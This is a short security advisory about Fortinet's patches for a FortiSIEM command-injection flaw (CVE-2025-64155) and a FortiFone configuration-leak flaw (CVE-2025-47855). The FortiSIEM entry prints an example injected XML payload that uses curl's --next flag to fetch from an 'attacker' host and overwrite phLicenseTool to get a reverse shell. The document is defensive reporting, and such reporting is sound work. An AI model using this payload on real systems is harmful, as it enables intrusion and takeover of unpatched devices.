Fortinet patches critical remote code execution and data leak flaws
Take action: Make sure your FortiSIEM and FortiFone devices or at least the critical ports are isolated from the internet and accessible from trusted networks only. Then plan an update ASAP. Since there's a PoC exploit for CVE-2025-64155, this just become urgent.
Learn More
Fortinet released patches for two critical security flaws in its FortiSIEM and FortiFone products that allow attackers unauthenticated access to the system.
Vulnerabilities summary:
- CVE-2025-64155 (CVSS score 9.4) - An OS command injection flaw in FortiSIEM that allows unauthenticated remote code execution via port 7900. This service processes custom API messages without authentication, mapping commands to handlers via integers in
phMonitorProcess::initEventHandler.The flaw targetshandleStorageRequestwith “elastic” storage type. User-controlled XML tags likecluster_nameandcluster_urlfeed into/opt/phoenix/phscripts/bin/elastic_test_url.sh. The script’s curl invocation viaexecveallows argument injection. By leveraging curl’s obscure–nextflag, attackers chain requests:<cluster_url>http://attacker:9200 –next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200</cluster_url>. This overwrites phLicenseTool executed every few seconds as a reverse shell, yielding admin access. This issue only affects Super and Worker nodes, not Collector nodes. - CVE-2025-47855 (CVSS score 9.3) - An information exposure flaw in FortiFone that allows unauthenticated attackers to download device configurations. Attackers can send a web request to the web admin to download the device configuration file that often contains sensitive data:
- Device configuration files
- Local system settings
- Network credentials or parameters
Fortinet advises users to update their software right away. If you cannot update FortiSIEM immediately, you should block access to port 7900.
Horizon3.ai released a proof-of-concept exploit on GitHub for CVE-2025-64155
